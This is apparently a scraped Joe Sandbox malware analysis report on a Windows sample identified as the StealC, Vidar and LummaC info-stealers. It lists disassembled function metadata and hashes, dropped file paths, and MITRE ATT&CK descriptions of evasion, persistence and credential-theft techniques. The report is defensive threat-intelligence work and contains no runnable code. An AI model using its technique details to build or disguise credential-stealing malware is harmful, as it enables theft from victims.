Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: 79ff59bb8fe37b592120c2f750650c2d69bd8399bd328241fb2a3656b32aa4fd
Instruction ID: 85b7f1abaac133bad4c89913ab8cf29bfa9ba3f5661a39f2f001586c21a8106a
Opcode Fuzzy Hash: 79ff59bb8fe37b592120c2f750650c2d69bd8399bd328241fb2a3656b32aa4fd
Instruction Fuzzy Hash: 77812D70A062558BD724CF39C2803AEBBF2AF45318F288A59D8A59BFC1D735D846C791

Function 6C8E4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C8E4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C8E4DE6

Strings

%d.%d, xrefs: 6C8E4DDE

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 299a537455e07097ce483150aaa1fd2018fa17c9bf42b72a27c5693603426834
Instruction ID: faa5169591e499cf0515894f5d692ef7fd7f016e632d7dfafcefcaea880ba5df
Opcode Fuzzy Hash: 299a537455e07097ce483150aaa1fd2018fa17c9bf42b72a27c5693603426834
Instruction Fuzzy Hash: C63120B2E042186BEB205BA59D01BFF7778DFC5309F050829ED1957741EB70D905CBA2

Function 6C8F0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C8F0DF5
TlsGetValue.KERNEL32 ref: 6C8F0E2D
TlsGetValue.KERNEL32 ref: 6C8F0E58
TlsGetValue.KERNEL32 ref: 6C8F0E84

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 785e9ec07a863faef3c62cbc954e7e5a1b7807b1cbd1b68453ca36cd6a4710f4
Instruction ID: 148ca34535f1d97055288fa368706186007c6f7160a8374534593503c1eb51f6
Opcode Fuzzy Hash: 785e9ec07a863faef3c62cbc954e7e5a1b7807b1cbd1b68453ca36cd6a4710f4
Instruction Fuzzy Hash: C731E8B1649385CFDB206F7CD7846697BB4BF06388F214E6DD8A887A11DB309086CB91

Function 6C8A1EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C8A1ECE
free.MOZGLUE(?), ref: 6C8A1EDF
free.MOZGLUE(?), ref: 6C8A1EEF
free.MOZGLUE(?), ref: 6C8A1EF5

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 451fd62061e4b7f9705595f264ed1c1942e48b3284f8004b3adcf44ae6ae8684
Instruction ID: b04306a3c2b60b0d64e0d077bf0d32ba8b7f4c8cd8cfd7fb385a5c1316726450
Opcode Fuzzy Hash: 451fd62061e4b7f9705595f264ed1c1942e48b3284f8004b3adcf44ae6ae8684
Instruction Fuzzy Hash: EAF0E9B1704115ABEF10DBA9EC45D27776CEF49594B140834EC5DC3A00E725F42187B1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Threatname: Cryptbot

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGCAFHCAKFBFIECAFIIJ

C:\ProgramData\DAFBGHCAKKFCAKEBKJKK

C:\ProgramData\DBKFIDAA

C:\ProgramData\DBKFIDAAEHIEGCBFIDBFHCGDAK

Windows Analysis Report
file.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre